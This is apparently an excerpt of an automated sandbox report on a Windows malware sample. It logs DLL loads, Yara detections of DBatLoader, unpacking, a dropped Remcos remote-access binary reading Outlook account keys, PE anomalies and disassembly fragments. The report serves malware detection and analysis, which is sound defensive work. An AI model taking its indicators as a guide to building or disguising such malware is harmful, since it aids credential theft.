                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                      Source: fu56fbrtn8.exeStatic file information: File size 1639424 > 1048576
                      Source: fu56fbrtn8.exeStatic PE information: Raw size of DATA is bigger than: 0x100000 < 0x114800
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                      Source: Binary string: easinvoker.pdbH source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1417481054.00000000150FE000.00000004.00000020.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr

                      Data Obfuscation

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeUnpacked PE file: 0.2.fu56fbrtn8.exe.15680000.10.unpack
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.2d1ce08.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.2de0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.2d3e308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.2d3e308.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.2cd9910.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1789281992.0000000002D51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1649498271.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3821247162.0000000002DF1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1533650563.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_1569CB50
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .
                      Source: Cmzcxhwn.PIF.5.drStatic PE information: real checksum: 0x0 should be: 0x1918cf
                      Source: netutils.dll.0.drStatic PE information: real checksum: 0x2c00d should be: 0x1f08e
                      Source: fu56fbrtn8.exeStatic PE information: real checksum: 0x0 should be: 0x1918cf
                      Source: remcos.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1918cf
                      Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: .
                      Source: netutils.dll.0.drStatic PE information: section name: /4
                      Source: netutils.dll.0.drStatic PE information: section name: /19
                      Source: netutils.dll.0.drStatic PE information: section name: /31
                      Source: netutils.dll.0.drStatic PE information: section name: /45
                      Source: netutils.dll.0.drStatic PE information: section name: /57
                      Source: netutils.dll.0.drStatic PE information: section name: /70
                      Source: netutils.dll.0.drStatic PE information: section name: /81
                      Source: netutils.dll.0.drStatic PE information: section name: /92
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_029E009D push dword ptr [esi-5D3DF0BBh]; retf 0_3_029E00B1
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_029E2BAE push dword ptr [esi-5D3D056Dh]; iretd 0_3_029E2BB5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_029E23C9 push dword ptr [esi-5D3D05BBh]; iretd 0_3_029E23DD
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02B0C6F9 push cs; retf 0_3_02B0C6FE
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02B0802D push ss; retf 0_3_02B08053
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02AE57F3 push edi; iretd 0_3_02AE57F4
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02B0C120 push es; retf 0_3_02B0C12B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BA12D3 pushfd ; ret 0_3_02BA12D4
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BA5FF8 push es; retf 0_3_02BA6003
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BA65D1 push cs; retf 0_3_02BA65D6
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BA1F05 push ss; retf 0_3_02BA1F2B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156DE54D push esi; ret 0_2_156DE556
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156DB163 push esp; ret 0_2_156DB141
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156DB143 pushad ; ret 0_2_156DB151
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156D7106 push ecx; ret 0_2_156D7119
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156DB18B pushfd ; ret 0_2_156DB191
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156DB0F3 push esp; ret 0_2_156DB141
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B4E56 push ecx; ret 0_2_156B4E69
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156DC963 push eax; retf 0_2_156DC981
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156DC983 pushad ; retf 0_2_156DC989
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156D7A28 push eax; ret 0_2_156D7A46
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02E0A2F4 push 02E0A35Fh; ret 0_2_02E0A357
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DE32F0 push eax; ret 0_2_02DE332C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DFD20C push ecx; mov dword ptr [esp], edx0_2_02DFD211
